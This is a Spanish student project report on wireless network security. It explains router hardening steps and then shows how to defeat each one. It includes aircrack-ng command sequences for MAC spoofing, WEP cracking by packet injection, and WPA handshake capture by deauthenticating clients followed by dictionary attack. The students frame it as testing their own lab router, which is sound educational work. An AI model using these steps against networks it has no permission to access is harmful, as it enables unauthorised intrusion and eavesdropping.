seguridad de redes inalámbricasinformatica.gonzalonazareno.org/plataforma/file.php/7/g...redes/...

26
Redes/ Proyecto 2/ Grupo 21 24/02/10 Proyecto 2: Seguridad de Redes Inalámbricas Alumnos: JUAN MIGUEL LÓPEZ RUBIO ROCÍO DOMÍNGUEZ RODRÍGUEZ RUBÉN BENÍTEZ TIRADO Fecha de entrega: Grupo: 21 Proyecto: 2 Modulo: Redes 1

Upload: ledien

Post on 17-Apr-2018

222 views

Category:

Documents


3 download

TRANSCRIPT

Redes/ Proyecto 2/ Grupo 21 24/02/10

Proyecto 2:

Seguridad de Redes

Inalámbricas

Alumnos: JUAN MIGUEL LÓPEZ RUBIO ROCÍO DOMÍNGUEZ RODRÍGUEZ

RUBÉN BENÍTEZ TIRADO

Fecha de entrega: Grupo: 21 Proyecto: 2 Modulo: Redes

1

Redes/ Proyecto 2/ Grupo 21 24/02/10

Índice de contenido1 INTRODUCCIÓN.............................................................................................................................22 MEDIDAS BÁSICAS.......................................................................................................................4

A) Cambiar el pasword y la dirección de puerta de enlace que tiene el router por defecto............4B) Desabilitar la configuración inalámbrica ...................................................................................5C) Cambiar HTTP por HTTPS........................................................................................................5D) Ocultar nuestra SSID..................................................................................................................6E) Desactivar el servidor DHCP. ....................................................................................................8

2 FILTRADO MAC............................................................................................................................11Configuración Filtrado MAC.........................................................................................................11

3 CLAVES..........................................................................................................................................16A) Claves WEP..............................................................................................................................16

Romper claves WEP.................................................................................................................18B) WPA..........................................................................................................................................19

2

Redes/ Proyecto 2/ Grupo 21 24/02/10

1 INTRODUCCIÓN

Objetivos del trabajo.El objetivo de este proyecto es aprender a poner medidas de seguridad lo suficientemente fuerte para no ser violadas, es decir, aprender a configurar los diferentes tipos de medidas de seguridad.Este proyecto va a consistir en implementar un sistema de seguridad y intentar romper todas las contraseñas. Aprender como poner sistemas de seguridad como tipo WEP, WPA. tkip, etc. También a romper esas contraseñas para poder comprobar lo seguras que son frente a un ataque.

Resumen de lo que vamos a realizar en este proyecto:

• En primer lugar medidas básicas para una buena seguridad, como son:◦ A) Cambiar el pasword y la dirección de puerta de enlace que tiene el router por defecto.◦ B) Desabilitar la configuración inalámbrica ( Solo nosotros conectados al router con el

cable podemos configurarlo ).◦ C) Cambiar HTTP por HTTPS (HTTPS es más seguro, Es mas difícil descifrar los

paquetes).◦ D) Ocultar nuestra ESSID, es decir, dejaremos de ser visibles a otros. Aunque veremos

que esto no es cierto. Y como conectarnos.◦ E) Desactivar el servidor DHCP. Solo los equipos con la ip que estén configuradas

dentro de nuestra red. Y como configurar para poder conectarnos.

• En segundo lugar medidas como:◦ A) Filtrado MAC, (solo los equipos con las MAC que nosotros permitimos podrán

entrar). Como conectarnos si no estamos en la lista blanca.

• Y por ultimo medidas de seguridad con contraseñas:◦ A) Claves WEP y romperlas.◦ B) Claves WPA y romperlas.

¿Qué materiales necesitamos?

• Un router Inalámbrico, por ejemplo, un router linksys WRT54G o un Thomson • Una tarjeta de red inalámbrica en el pc.• El software aircrack-ng.• Un SO Linux, por ejemplo, un DEBIAN.

3

Redes/ Proyecto 2/ Grupo 21 24/02/10

2 MEDIDAS BÁSICAS

A) Cambiar el pasword y la dirección de puerta de enlace que tiene el router por defecto.

Para realizar este paso debemos meternos con el navegador web, ( firefox, explorer, etc) y teclear la dirección de la puerta de enlace. Normalmente viene 192.168.1.1 o 192.168.1.1. En el manual del router lo especificará. De todas formas haciendo un (ejecutar – cmd – ipconfig) en Windows y un ifconfig en Linux podremos ver la dirección de la puerta de enlace. (Estando previamente conectados a la red).

Pasos a seguir:

4

Puerta de enlace

Redes/ Proyecto 2/ Grupo 21 24/02/10

• Nos metemos en la web del servidor del router. Nos vamos a BASIC o ESTATUS, y hay estarán las opciones para cambiar la dirección de la puerta de enlace y la contraseña para poder entrar.

B) Desabilitar la configuración inalámbrica .

Esta opción nos permite que solo nosotros conectados con el cable al router podamos configurarlo. ( Solo se puede configurar si estás conectado con el cable al router)

C) Cambiar HTTP por HTTPS.

Al cambiar a HTTPS haremos que los datos lleven una encriptacción mucho más fuerte. Haciendo más seguro nuestros datos frente a ataques.

Pasos a seguir:

5

Redes/ Proyecto 2/ Grupo 21 24/02/10

• HTTP es el protocolo normal del WWW, el estándar no encriptado que todos usamos a través de nuestros navegadores para acceder a páginas Web.

• HTTPS es un protocolo que encripta la comunicación para con ello aumentar la seguridad de la del intercambio de información Cliente-Servidor.

D) Ocultar nuestra SSID.

Esto significa que la red no será visible a los demás equipos. Esto no es del todo cierto, porque, hay métodos tanto en Linux como en Windows para conectarnos a una red oculta.

Los pasos a seguir para ocultar nuestra red son los siguientes:

6

Redes/ Proyecto 2/ Grupo 21 24/02/10

• Nos vamos a la pestaña Wireless- Basic Wireless settings.• En wireless SSID Broadcast cambiamos Enable (permitir) a Disabled (desabilitar ).• Y guardar.

Con esto tendremos ocultado nuestra red.

¿Como podemos conectarnos a un red oculta?

En Linux es muy sencillo. Solo tenemos que abrir un terminal como superusuario, y teclear los siguientes comandos :

• Para hacer un escaneo de la red ejecutamos un iwlist scanning. (veremos las redes que están en nuestro alcance).

7

Redes/ Proyecto 2/ Grupo 21 24/02/10

• A continuación nos asociamos al punto de acceso.◦ Si sabemos el nombre de la red ejecutamos iwconfig wlan0 essid g21

(interfaz) (Nomb.red)

◦ Si no sabemos el nombre nos conectamos con el siguiente comando. iwconfig wlan0 ap (mac)

(Interfaz) (La MAC del router)

La MAC del router la podemos saber haciendo un Iwlist scanning. (Mirar imagen de Iwlist scanning).

E) Desactivar el servidor DHCP.

Al desactivarlo, solo los equipos que tengan configurado el TCP/ iP de nuestra red podrán entrar.No da direcciones automáticamente a los equipos.

Los pasos a seguir son:

8

Dirección MAC del router necesario si no sabemos el nombre.

Nombre

Redes/ Proyecto 2/ Grupo 21 24/02/10

• En la pestaña Basic- Setup esta la opción para desabilitar el servidor DHCP.• Para desactivarlo le damos a Disable (Desactivar).

Para configurar la configuración de red debemos hacer lo siguiente:

• En Windows es tan fácil como irnos a conexiones de red- Propiedades – Protocolo TCP/IP – Y configurarlo manualmente. (Qué estén dentro de nuestra red).

9

Desactivar/activar el servidor DHCP

Activar/ DesactivarServidor DHCP

Redes/ Proyecto 2/ Grupo 21 24/02/10

• En Linux ejecutamos el comando nano /etc/network/interfaces• Editamos los parámetros de DHCP a estatic de la tarjeta de red inalámbrica.

Así es como quedaría el fichero /etc/network/interfaces

10

Redes/ Proyecto 2/ Grupo 21 24/02/10

2 FILTRADO MAC

El filtrado MAC consiste en decirle al router, (metafóricamente) que ordenadores queremos que se conecten a la red. Solo los ordenadores con las MAC que estén permitidas podrán entrar. ( Si no estás en la lista no puedes pasar a la fiesta ) XD.

Esta medida de seguridad es muy buena, aunque como todas no son perfectas.

Configuración Filtrado MAC¿ Como configuramos el filtrado MAC ?.

11

A Configurar

Redes/ Proyecto 2/ Grupo 21 24/02/10

Pasos a seguir:

• Nos vamos a la ventana wireless – wirelles MAC filter.

• En ella le damos a enable (permitir) .

• Tenemos dos opciones:

◦ Denegar Pc.

◦ Permitir PC.

• En este caso le damos a Permitir y a continuación le damos a editar la lista del filtro de las MAC.

• En la siguiente ventana escribimos la direcciones MAC que queremos y guardamos.

• Es muy importante que se guarde porque si no, no hará efecto.

12

Redes/ Proyecto 2/ Grupo 21 24/02/10

¿Cómo nos conectamos a un red con filtrado MAC y nuestro pc no tiene permiso?.

Lo que tenemos que hacer es cambiar nuestra MAC por una de las que si tienen permiso.

¿Cómo se hace?.

• Instalamos el Software aircrack-ng en linux.

◦ En el terminal y como superusuario ejecutamos aptitude install aircrack-ng

◦ Aceptamos la instalación.

13

Redes/ Proyecto 2/ Grupo 21 24/02/10

• En la consola ejecutamos (siempre como superusuario) : airmon-ng start wlan0 esto hará que pongamos la tarjeta en modo monitor para poder escuchar el tráfico de la red .

14

Redes/ Proyecto 2/ Grupo 21 24/02/10

• Para escuchar el trafico de la red escribimos airodump-ng ( canal de la red a escuchar ) –w nombre mon0 –w (nombre es el documento) donde se guardaran la escucha .◦ En nuestro caso quedaria: airodump-ng 8 -w nombre mon0

• Después de ver realizado el escaneo nos saldrá una pantalla como esta . Nos fijamos en la BSSID que sea la del route y a continuación nos fijamos en STATION que son los clientes conectados a ese RED. A continuación cambiamos la MAC de nuestra tarjeta de red.

15

Redes/ Proyecto 2/ Grupo 21 24/02/10

• Ya solo queda cambiar nuestra dirección MAC por esa.

◦ En Linux ejecutamos en un terminal :

▪ ifconfig eth0 down

ifconfig hw ether (nueva_direccion_MAC)

ifconfig eth0 up

Con esto hemos cambiado nuestra dirección por una que si tiene permitida la entrada.

3 CLAVES

A) Claves WEP.

¿Qué es una clave WEP?.

16

Cliente conectado al router, esa es una MAC que esta permitida.Lo que hay que hacer es cambiar la nuestra por esa.

Redes/ Proyecto 2/ Grupo 21 24/02/10

WEP es un protocolo de cifrado de trama de datos 802.11 que utiliza el algoritmo simétrico RC4 con claves de 64 bits o 128 bits. El concepto de WEP consiste en establecer una clave secreta de 40 o 128 bits con antelación. Esta clave secreta se debe declarar tanto en el punto de acceso como en los equipos cliente.

Las claves WEP no son muy seguras.

Para configurar este tipo contraseña es muy sencillo:

• Nos vamos a la pestaña Wirelles- Wirelles Security.

• En ella elegimos el modo de seguridad, en este caso WEP.

• Elegimos la WEP encriptación 128 bits, es más segura.

17

Redes/ Proyecto 2/ Grupo 21 24/02/10

• Y donde pone Passphrase ponemos la clave.

• Le damos a generar.

• Y a continuación a guardar.

¿Cómo nos conectamos a una red con esta encriptación?

Romper claves WEP1er PASO : Configurar la tarjeta en modo monitor: AIRMON.

ifconfigiwconfigifconfig wlan0 upairmon-ng start wlan0airmon-ng start mon0ifconfig mon0 downmacchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up

18

Redes/ Proyecto 2/ Grupo 21 24/02/10

2º PASO: Capturar paquetes: AIRODUMP.

airodump-ng mon0 (localizas la red y apunta su MAC y su canal)control-c (Para parar el airodump)airodump-ng mon0 -w rubens -c (canal) (lo dejas capturando)

3er PASO: Autentificarse : AIREPLAY, en otra consola

aireplay-ng -1 8 -e jander -a 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0

(si la autentificacion es correcta, debe decir sucessful :) pasas al siguiente paso.

19

MAC del router Nuestra MACNombre del archivo

Nombre del archivo

Redes/ Proyecto 2/ Grupo 21 24/02/10

4º PASO : Inyectar paquetes: AIREPLAY.

20

Redes/ Proyecto 2/ Grupo 21 24/02/10

aireplay-ng -3 -b 00:13:f7:1D:B6:CF -h 00:11:22:33:44:55 mon0

y cuando llegues a 120000 arps:

5º PASO: Buscar clave en el archivo de captura jander.cap : AIRCRACK.

aircrack-ng jander*.cap

KEY FOUND! [ CF:CF:CF:CF:CF ]

21

MAC del router Nuestra MAC

Nombre del archivo

Redes/ Proyecto 2/ Grupo 21 24/02/10

B) WPA.

¿Qué es una clave WPA?.Es un sistema para corregir la seguridad de WEP. WPA implementa la mayoría del estándar IEEE 802.11i. WPA fue diseñado para utilizar un servidor de autenticación (normalmente un servidor RADIUS), que distribuye claves diferentes a cada usuario (a través del protocolo 802.1x ); sin embargo, también se puede utilizar en un modo menos seguro de clave pre-compartida (PSK - Pre-Shared Key). La información es cifrada utilizando el algoritmo RC4, con una clave de 128 bits y un vector de inicialización de 48 bits.

¿Cómo configuramos nuestro router para tener este tipo de clave?Paso 1:Cuando aparezca la página web de configuración del router, hacemos clic en Inalámbrico luego hacemos clic en Seguridad Informática.

Paso 2:Buscamos el Modo de Seguridad y seleccionamos WPA-Personal.

Paso 3:Busque Encriptación y selecionamos TKIP.

Paso 4:Buscamos Frase Clave e ingresamos ?MiClaveSecreta? o su Clave WPA deseada en el campo. Esto servirá como la clave de red siempre que nos conectemos a la red inalámbrica.

22

Redes/ Proyecto 2/ Grupo 21 24/02/10

¿Cómo nos conectamos a una red con esta encriptación?

1er Paso: Configurar la tarjeta :AIRMON

ifconfigiwconfig ifconfig wlan0 upairmon-ng start wlan0airmon-ng start mon0

23

Nuestra interfaz en modo monitor

Redes/ Proyecto 2/ Grupo 21 24/02/10

2º Paso: Capturar paquetes: AIRODUMP

airodump-ng mon0cuando veas tu punto de acceso a atacar, control-c y en otra consola :airodump-ng -c 6 --bssid 00:13:F7:1D:B6:CF -w jander mon0

24

Canal del router

MAC del Router

Archivo

Nuestra interfaz

Redes/ Proyecto 2/ Grupo 21 24/02/10

3er Paso: Deautentificar : AIREPLAY en otra consola

aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50 mon0

Después de usar este comando, fijaros de vez en cuando en la pantalla del airodump, ARRIBA A LA DERECHA, y ahí debe aparecer el preciado handshake y a continuación, el 4º paso.

4º Paso: Buscar la clave en el :AIRCRACK,en otra consola

aircrack-ng -w dictionary_spanish.dic -o jander*.cap

KEY FOUND! [ CF:CF:CF:CF:CF ]

25

MAC del router

MAC de un cliente conectado

Diccionario Archivo

Redes/ Proyecto 2/ Grupo 21 24/02/10

Si todo va correcto nos saldrá la clave KEY FOUND

Hecho por: Rubén Benítez Tirado Rocío Domínguez Rodríguez Juan Miguel Lopez Rubio

26